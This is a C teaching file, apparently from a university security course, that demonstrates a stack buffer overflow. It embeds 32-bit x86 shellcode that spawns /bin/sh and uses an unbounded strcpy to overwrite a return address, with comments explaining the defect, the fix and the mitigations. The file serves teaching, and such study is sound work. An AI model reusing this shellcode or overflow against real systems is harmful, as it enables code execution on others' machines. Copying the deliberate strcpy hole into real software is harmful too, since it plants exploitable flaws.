progs/C3.c
author Christian Urban <christian dot urban at kcl dot ac dot uk>
Tue, 26 Sep 2017 12:35:32 +0100
changeset 537 72dbf4154173
parent 476 cd82c24373cd
permissions -rw-r--r--
updated
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
/*
 * Payload bytes used by the overflow demonstration in main().
 *
 * NOTE(review): the sequence looks like the widely published 32-bit x86
 * Linux example that execs the "/bin/sh" path appended at its end; confirm
 * by disassembling before relying on this description.
 *
 * The literal contains no embedded NUL byte, so strlen() and strcpy() in
 * main() process all of it; the only terminator is the implicit one that
 * follows "/bin/sh".
 *
 * Defensive note: bytes stored as data only run if control flow is
 * redirected into memory that is executable. A non-executable stack/data
 * policy (NX/DEP) therefore stops this payload even if the overflow in
 * main() corrupts the return address.
 */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  "\xff\xff/bin/sh";

/*
 * 128-byte staging area that main() fills and then passes to strcpy().
 * It is deliberately larger than the 96-byte destination used there.
 */
char large_string[128];
/*
 * Self-contained demonstration of a stack-based buffer overflow (CWE-121).
 *
 * The program builds a 128-byte source in large_string and copies it with
 * strcpy() into the 96-byte local `buffer`, so the copy writes past the end
 * of `buffer` into whatever the compiler placed after it on the stack.
 * Every statement below is intentional for the lesson; the behaviour is
 * undefined in C and depends on the exact stack layout, so the code is left
 * untouched and only annotated.
 *
 * What a reviewer should take from it:
 *  - The root cause is the unbounded strcpy(): nothing compares the source
 *    length with sizeof buffer. A bounded copy that checks for truncation,
 *    e.g. snprintf(buffer, sizeof buffer, "%s", large_string), removes the
 *    overflow.
 *  - Compiler and OS hardening (stack protector canaries, _FORTIFY_SOURCE,
 *    non-executable stack, ASLR) are each expected to interfere with this
 *    demo; they are mitigations, not a substitute for the length check.
 *
 * `void main()` is not a standard signature; a hosted program should use
 * `int main(void)`.
 */
void main() {
  char buffer[96];   /* overflow target: 32 bytes smaller than large_string */
  int i;
  long *long_ptr = (long *) large_string;   /* view the char array as longs */

  /*
   * Fill large_string with 32 copies of buffer's address.
   * Assumes sizeof(long) == 4 so that 32 stores cover exactly 128 bytes;
   * where long is 8 bytes this loop itself writes past large_string.
   * The (int) cast also truncates the pointer where pointers are wider
   * than int.
   */
  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  /*
   * Overlay the payload on the start of large_string. The terminating NUL
   * of shellcode is not copied (loop bound is strlen), and strlen() is
   * re-evaluated on every iteration with a signed/unsigned comparison
   * against `i`.
   */
  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  /*
   * The defect being demonstrated: strcpy() copies until it meets a NUL.
   * All 128 bytes of large_string were just overwritten, so a terminator is
   * not guaranteed inside the array; the copy reads at least as far as the
   * first zero byte it finds and writes the same amount into the 96-byte
   * buffer.
   */
  strcpy(buffer,large_string);
}